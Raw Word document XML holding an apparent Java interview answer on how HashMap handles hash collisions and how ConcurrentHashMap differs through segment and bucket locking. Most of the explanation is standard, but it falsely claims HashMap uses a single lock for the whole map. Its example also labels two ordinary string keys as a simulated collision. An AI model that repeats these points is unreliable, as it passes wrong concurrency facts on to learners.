        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="_Toc196307670"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If we have added the same key in HashMap with the same value and different key with the same hash with the same value, then how will it be stored? At what position data will store and how it will store? What will happen when we use ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>
    </w:p>
    <w:p w14:paraId="0DEBED0A" w14:textId="4EEF861F" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">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Let's break down the scenario where you have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two keys with the same hash code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a HashMap, along with how the data is stored and how it differs when using ConcurrentHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF159D2" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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HashMap with Same Hash Code and Same Value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0FA82C" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ing Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you add a key-value pair to a HashMap, the key's hash code is computed using its hashCode() method. The hash code is then used to determine the bucket where the key-value pair will be stored in the hash table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB3ACD9" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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two different keys have the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same hash code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a hash collision), they will be placed in the same bucket (index in the hash table array).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFAED41" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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your case, you have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two keys with the same hash code</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the same value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the keys are not </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (even though the values are the same), they will be stored in the same bucket but as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separate entries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776CAA28" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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orage in HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC8AEAE" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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fore Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The entries are stored as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the same index in the bucket. Each node in the linked list contains a key-value pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E1FD4A" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8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this case, when you insert the second key-value pair with the same hash code, it will be stored as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the linked list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBEBC93" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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rom Java 8 onwards</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If the number of collisions increases (i.e., many keys with the same hash code), the linked list may be converted into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>balanced tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Red-Black tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). This improves search performance from O(n) (for a linked list) to O(log n) (for a tree).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33553230" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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o, the second key-value pair will be inserted as another node in the linked list or tree at the same index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66732CA8" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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pdate Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B852556" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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same key is added with the same value, the value will be updated in the existing node of the linked list or tree at the bucket’s index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF63B31" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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the key-value pair has the same key but a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it will replace the previous value at the same index (bucket) and update the entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A49B6D2" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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18F75F0C" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65061125" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CCA4B7" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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HashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D7C604" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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55D45082" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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HashMap&lt;String, String&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2168E3" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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key1", "value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C1A841" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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put("key2", "value");  // Same value but different key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41608CA5" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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0007746" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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imulating hash collision (same hash code but different keys)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC9066" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C55F9" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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92AFEC8" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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17D29E1" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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hat happens when we add these two keys?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BC73CF" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86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keys key1 and key2 might have the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB38239" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86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se two entries will be stored in the same bucket in the hash table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A979D20" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86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collisions occur, both keys will be stored in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</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Red-Black tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in Java 8+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157394FE" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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ConcurrentHashMap Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2788E0" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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oncurrentHashMap is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations, and it handles concurrent updates to the map more efficiently than HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBAC07C" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86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orage in ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207716FC" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86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gmented Locks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ConcurrentHashMap divides the internal map structure into multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (originally in Java 7 and earlier versions, now it's split into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and each bucket can be locked individually in Java 8+). Each thread locks a specific segment, so concurrent threads can work on different segments without blocking each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B99565" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86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Concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When you update the ConcurrentHashMap, only the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>relevant segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is locked, so updates are done concurrently across different segments. For example, if two threads are updating different keys that hash to different segments, the updates can happen simultaneously without thread contention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A500FB" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86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ndling Collisions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Internally, ConcurrentHashMap still uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> structure, and it can handle hash collisions in the same way as HashMap (using linked lists or trees), but it ensures thread-safety by allowing fine-grained locking at the bucket or segment level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42238D5A" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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Differences in Handling Hash Collisions and Updates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F28C4F" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFDB201" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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s a single lock for the entire map (non-thread-safe in terms of concurrent modifications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA29B25" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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collisions occur, keys with the same hash code are placed in the same bucket (in a linked list or tree).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26988F" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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you add the same key, it will overwrite the existing value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B76FAD" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564435DC" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ndles concurrent reads and writes in a thread-safe manner by using finer granularity locks (like locks on buckets or segments).</w:t>
      </w:r>
    </w:p>
